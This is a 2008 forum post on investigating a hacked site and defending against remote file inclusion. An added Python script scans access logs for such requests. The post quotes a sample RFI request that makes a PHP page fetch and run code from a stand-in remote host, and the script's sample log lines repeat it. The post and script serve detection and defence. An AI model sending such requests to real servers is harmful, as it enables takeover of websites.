SteveWh - 7:51 pm on Apr 2, 2008 (gmt 0)
If you use blog, forum, CMS, etc etc software (WordPress, for example), it *must* always be kept at the latest version or else your site is a sitting duck.

Note the timestamp of any file that was modified maliciously. Then search your access logs (FTP and HTTP) for who was accessing what at that moment. I think by default GoDaddy doesn't provide access logs, but they offer an add-on service that does, and it might be worth it. As an alternative, if you are somewhat proficient with PHP, you could probably create a header include file that would write the details of each access to your own private access log, to substitute for the server one.

RFI attacks are rampant these days. In your logs, they look similar to:

GET /index.php?inc=hxxp://someothersite.com/safe.txt?

If your php.ini file does not block RFI, then, as index.php runs, it retrieves the safe.txt file from the remote site. safe.txt is usually written in PHP and contains commands that modify files on your server, such as overwriting your .htaccess file. It is able to do that because it runs as if it were an integral part of your index.php file. It is a way hackers get their own code to run on your server as if you wrote it.

There are several other possibilities how this is occurring, but RFI is the first to defend against. If that doesn't work, start looking at the less common ones.

[edited by: SteveWh at 7:54 pm (utc) on April 2, 2008]
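The log search described in the post above, as an added example that is not part of the original post: a Python script that scans Apache-format access log lines for query parameters whose value is itself a URL, optionally limited to a window around the timestamp of the modified file. The log lines, IP addresses, the `remote.example` host, the modification time and the five-minute window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import urlsplit, parse_qsl

# Apache common/combined format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
# A parameter value that is itself a URL is the RFI signature the post describes.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)

def rfi_hits(lines, modified_at=None, window=timedelta(minutes=5)):
    """Return (time, ip, status, param, value) for each URL-valued query
    parameter. With modified_at (timezone-aware), keep only requests made
    within +/- window of that file modification time."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected log format
        ip, stamp, _method, target, status = m.groups()
        when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
        if modified_at and abs(when - modified_at) > window:
            continue
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                hits.append((when, ip, int(status), name, value))
    return hits

# Constructed sample lines (documentation address ranges), not from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Apr/2008:19:40:11 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '198.51.100.7 - - [02/Apr/2008:19:47:03 +0000] "GET /index.php?inc=http://remote.example/safe.txt? HTTP/1.1" 200 312',
    '198.51.100.7 - - [02/Apr/2008:19:47:09 +0000] "GET /index.php?inc=http%3A%2F%2Fremote.example%2Fsafe.txt%3F HTTP/1.1" 200 312',
    '203.0.113.5 - - [01/Apr/2008:03:12:45 +0000] "GET /index.php?inc=ftp://remote.example/x.txt HTTP/1.1" 404 210',
]
# Assumed timestamp of the maliciously modified file (e.g. .htaccess).
MODIFIED_AT = datetime(2008, 4, 2, 19, 48, tzinfo=timezone.utc)

if __name__ == "__main__":
    for when, ip, status, name, value in rfi_hits(SAMPLE_LOG, MODIFIED_AT):
        print(when.isoformat(), ip, status, f"{name}={value}")
```

A 200 status on a hit only shows that the page was served; whether the remote file was actually included depends on the PHP configuration at the time.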
Echoing dial_d and lorax, be sure to create a php.ini file that prevents remote file inclusion. I believe GoDaddy permits php.ini, so use it. You can also block RFI attempts in your .htaccess file using a different method. If it won't damage the functionality of your site (you need to test it), it's best to put defensive code in *both* places.